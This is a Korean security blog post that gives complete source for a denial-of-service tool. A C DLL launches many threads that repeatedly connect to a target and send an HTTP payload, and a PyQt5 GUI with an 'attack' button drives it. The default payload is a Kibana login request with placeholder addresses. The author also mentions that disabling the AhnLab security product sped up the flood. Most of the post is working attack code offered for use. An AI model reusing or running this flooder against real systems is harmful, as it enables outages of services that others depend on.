앵하니의 더 나은 보안

DoS 공격 GUI with ctypes 본문

보안 기술/Network

DoS 공격 GUI with ctypes

앵한 2023. 6. 9. 12:10

개요

  • Python으로 패킷을 전송하게 하니 괜히 GIL때문에 느린 것 같고 느린 언어 체계도 좀 걸림돌이 되는 듯한 기분이 듦
  • 그래서 쓰레드 생성 및 패킷을 전송하는 부분은 C로 구현해 DoS 공격의 속도를 높여 효율을 높이고자 함

구현 방법

  1. python에서 사용할 dll 파일 컴파일
  2. 기존 dos_gui.py 파일에서 cyptes 모듈을 import
  3. ctypes.CDLL로 컴파일한 dll 파일 import 및 dll 함수 호출
    > 함수 전달 인자는 host:port, 데이터, 데이터 길이, 쓰레드 수
  4. dll 파일에서 호출된 함수에 따라 자체 쓰레드 생성 및 HTTP 소켓 전송

구현 파일

#pragma comment(lib, "ws2_32.lib")
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define _CRT_SECURE_NO_WARNINGS

#include <stdio.h>
#include <WinSock2.h>
#include <Windows.h>
#include <stdbool.h>
#include <wchar.h>

static bool stop_signal = false;
static char* data;
static int data_len;
static char* host;
static int port;


char* convert_wchar_to_char(wchar_t* wide_str) {
    size_t buffer_size = wcstombs(NULL, wide_str, 0) + 1;
    char* buffer = (char*)malloc(buffer_size);
    wcstombs(buffer, wide_str, buffer_size);

    return buffer;
}

__declspec(dllexport) void stop_sig(bool stop_bool) {
    stop_signal = stop_bool;
}

void send_data() {
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);
    SOCKET socket_desc = socket(PF_INET, SOCK_STREAM, 0);
    SOCKADDR_IN server;

    while (!stop_signal) {
            server.sin_family = AF_INET;
            server.sin_port = htons(port);
            inet_pton(AF_INET, host, &server.sin_addr);

            connect(socket_desc, (SOCKADDR*)&server, sizeof(server));
            send(socket_desc, data, data_len, 0);
      }
}

__declspec(dllexport) void make_thread(wchar_t* arg_data, int arg_data_len, wchar_t* arg_host, int arg_port, int thread_num) {

    data = convert_wchar_to_char(arg_data);
    data_len = arg_data_len;
    host = convert_wchar_to_char(arg_host);
    port = arg_port;
    DWORD threadId;
    HANDLE hThread;

    for (int i = 0; i < thread_num-1; i++)
    {
        hThread = CreateThread(NULL, 0, send_data, NULL, 0, &threadId);
        CloseHandle(hThread);
    }
    
    hThread = CreateThread(NULL, 0, send_data, NULL, 0, &threadId);
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
}
from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QPlainTextEdit, QTabWidget, QVBoxLayout, QHBoxLayout, QPushButton, QSpinBox, QLabel, QComboBox
from PyQt5.QtGui import QTextCursor, QColor, QPalette
from PyQt5.QtCore import Qt
from socket import *
import threading
import ctypes

class MainWindow(QMainWindow):
    def __init__(self):
        super().__init__()

        #c lib 함수 정의
        self.http_socket_lib = ctypes.CDLL('C:/Users/[유저명]/Desktop/http_socket_send.dll')

        # 메인 윈도우 설정
        self.setWindowTitle("HTTP Request Tool")
        self.setGeometry(100, 100, 800, 600)
        self.centralWidget = QWidget()
        self.setCentralWidget(self.centralWidget)
        self.stop = 0

        # 탭 설정
        self.tabs = QTabWidget()
        self.tab_plain = QWidget()
        self.tab_hex = QWidget()
        self.tabs.addTab(self.tab_plain, "plain")
        self.tabs.addTab(self.tab_hex, "hex")
        self.tab_plain.layout = QVBoxLayout(self.tab_plain)
        self.tab_hex.layout = QVBoxLayout(self.tab_hex)

        # 텍스트 필드 설정
        self.text_edit_plain = QPlainTextEdit(self)
        self.text_edit_plain.insertPlainText("POST /internal/security/login HTTP/1.1\n"
                                             "Host: 1.2.3.4:5601\n"
                                             "Connection: keep-alive\n"
                                             "Content-Length: 160\n"
                                             "kbn-version: 8.6.2\n"
                                             "x-kbn-context: %7B%22type%22%3A%22application%22%2C%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D\n"
                                             "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\n"
                                             "Content-Type: application/json\n"
                                             "Accept: */*\n"
                                             "Origin: http://1.2.3.4:5601\n"
                                             "Referer: http://1.2.3.4:5601/login?msg=LOGGED_OUT\n"
                                             "Accept-Encoding: gzip, deflate\n"
                                             "Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\n"
                                             "\n"
                                             "{\"providerType\":\"basic\",\"providerName\":\"basic\",\"currentURL\":\"http://172.20.42.109:5601/login?msg=LOGGED_OUT\",\"params\":{\"username\":\"test\",\"password\":\"testtest\"}}")
        self.text_edit_hex = QPlainTextEdit(self)
        self.text_edit_plain.setReadOnly(False)
        self.text_edit_hex.setReadOnly(False)
        self.tab_plain.layout.addWidget(self.text_edit_plain)
        self.tab_hex.layout.addWidget(self.text_edit_hex)

        #옵션 값들 설정
        self.option_layout = QHBoxLayout()
        #쓰레드 수 라벨
        self.thread_label = QLabel()
        self.thread_label.setText("쓰레드 수")
        #쓰레드 숫자 입력
        self.thread_spin_box = QSpinBox()
        self.thread_spin_box.setMinimum(1)
        self.thread_spin_box.setMaximum(10000)
        #http/https 종류
        self.http_combo_box = QComboBox()
        self.http_combo_box.addItem("http")
        self.http_combo_box.addItem("https")
        self.option_layout.addWidget(self.thread_label)
        self.option_layout.addWidget(self.thread_spin_box)
        self.option_layout.addWidget(self.http_combo_box)
        self.tab_plain.layout.addLayout(self.option_layout)

        # 버튼 설정
        self.button_attack = QPushButton("attack")
        self.button_stop = QPushButton("stop")
        self.button_stop.setEnabled(False)
        self.button_attack.clicked.connect(self.on_click_attack)
        self.button_stop.clicked.connect(self.on_click_stop)
        self.button_layout = QHBoxLayout()
        self.button_layout.addWidget(self.button_attack)
        self.button_layout.addWidget(self.button_stop)
        self.tab_plain.layout.addLayout(self.button_layout)

        # 메인 윈도우 레이아웃 설정
        self.layout = QVBoxLayout(self.centralWidget)
        self.layout.addWidget(self.tabs)
        
        # plain 탭에서 hex 탭으로 전환 시 plain 텍스트를 hex값으로 변환하여 반영
        self.tabs.currentChanged.connect(lambda i: self.update_hex_text_field() if i == 1 else None)
        # hex 탭에서 plain 탭으로 전환 시 hex값을 plain 텍스트로 변환하여 반영
        self.text_edit_hex.textChanged.connect(lambda: self.update_plain_text_field() if self.tabs.currentIndex() == 1 else None)

    def on_click_attack(self):
        # attack 버튼 클릭 시
        self.text_edit_plain.setReadOnly(True)
        self.text_edit_hex.setReadOnly(True)
        self.button_attack.setEnabled(False)
        self.button_stop.setEnabled(True)
        #self.payload = bytes.fromhex(self.text_edit_plain.toPlainText().encode('utf-8').hex().replace('0a','0d0a'))
        self.payload = self.text_edit_plain.toPlainText().replace('\n','\r\n')
        self.set_HostnPort()
        threading.Thread(target=self.start_attack, daemon=True).start()

    def on_click_stop(self):
        # stop 버튼 클릭 시
        self.text_edit_plain.setReadOnly(False)
        self.text_edit_hex.setReadOnly(False)
        self.button_attack.setEnabled(True)
        self.button_stop.setEnabled(False)
        self.http_socket_lib.stop_sig(True)

    def set_plain_text(self, text):
        # plain 탭의 텍스트 필드에 내용 채우기
        self.text_edit_plain.clear()
        self.text_edit_plain.insertPlainText(text)

    def set_hex_text(self, text):
        # hex 탭의 텍스트 필드에 내용 채우기
        self.text_edit_hex.clear()
        self.text_edit_hex.insertPlainText(text)
    
    def update_hex_text_field(self):
        plain_text = self.text_edit_plain.toPlainText()
        hex_text = plain_text.encode('utf-8').hex().replace('0a','0d0a')
        self.text_edit_hex.clear()
        self.text_edit_hex.insertPlainText(hex_text.upper())

    def update_plain_text_field(self):
        hex_text = self.text_edit_hex.toPlainText()
        try:
            plain_text = bytearray.fromhex(hex_text).decode('utf-8')
        except ValueError:
            plain_text = ''
        self.text_edit_plain.clear()
        self.text_edit_plain.insertPlainText(plain_text)

    def set_HostnPort(self):
        host = self.text_edit_plain.toPlainText().split("Host:")[1].split()[0]
        if ":" in host:
            host_n_port = host.split(":")
            self.host = host_n_port[0]
            self.port = int(host_n_port[1])
        else:
            self.port = 80
            #####################추후에 https 연결 구현 시 여기 수정 필요

    def start_attack(self):
        self.http_socket_lib.stop_sig(False)
        self.http_socket_lib.make_thread(ctypes.c_wchar_p(self.payload), ctypes.c_int(len(self.payload)), ctypes.c_wchar_p(self.host), ctypes.c_int(self.port),ctypes.c_int(self.thread_spin_box.value()))
            
if __name__ == "__main__":
    app = QApplication([])
    window = MainWindow()
    window.show()
    app.exec_()

 

공격 수행 능력

보안솔루션의 영향이 없지 않는듯, ahnlab 솔루션을 종료하니 속도가 뻥 뛴다.

한계

  • 막상 ctypes으로 dll 파일을 python에서 사용해보려고 하니 너무너무 불편했음
    • c 언어는 자료형이 엄청 많고 구분도 엄격한 것에 비해(문자열 자료형만 해도 wchar, wchar_t, char, tchar…) python은 자료형 사용이 훨씬 유연하다보니 두 가지 언어에서 사용하는 자료형의 싱크를 맞추는 작업만으로도 시간을 엄청 소요했음
    • dll을 쓸거라면 웬만하면 그냥 모두 C 언어로 작성하는게 나아 보임
  • 공격을 직접 수행하는 부분은 C 로 작성해서 속도가 훨씬 잘 나올줄 알았지만 실상은 비슷했음

결론

  • 단순히 소스코딩 언어만 바꾼다고 해서 속도가 드라마틱하게 차이 나고 그러진 않는 것으로 판단 됨
  • 보안 솔루션이 통신 속도에 어느정도 관여하는 듯 함
    테스트하는 도중 블루스크린이 너무 자주 떠서 찾아보니 Ahnlab 솔루션 때문이라더라,
    그래서 프로세스 종료했더니 속도가 100Mbps 수준으로 확 오름
Comments